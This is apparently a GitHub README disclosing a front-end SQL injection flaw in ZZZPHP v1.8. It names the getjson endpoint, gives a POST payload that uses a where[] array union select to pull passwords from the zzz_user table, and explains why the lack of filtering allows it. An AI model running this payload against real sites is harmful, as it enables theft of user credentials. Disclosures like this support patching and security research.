ZZZPHPv1.8前台某处SQL注入漏洞


README.md

Vulnerability analysis 


Injection point: http://127.0.0.1/zzzphp/form/index.php?module=getjson
Send a post request,and payload: table=gbook&where[]=1=1 union select password from zzz_user&col=1

5f4f53ab4bf5f.png

Analysis:

In the file:https://github.com/h4ckdepy/zzzphp/blob/master/form/index.php line:262
get_json() method supports execution through the getmodule() method and when the value of the $act variable is getjson. At this time, it will get the URL as follows: http://127.0.0.1/zzzphp/form/index.php?module=getjson Post. And in the where parameter, the array can be used to bypass the restriction, and there is no SQL injection filter on the parameter, resulting in SQL injection.


About

阅读前,请务必阅读《阅读指南》

Notice

接各类后端开发业务,老板可联系~

Contact

邮箱:xb@whitecap100.org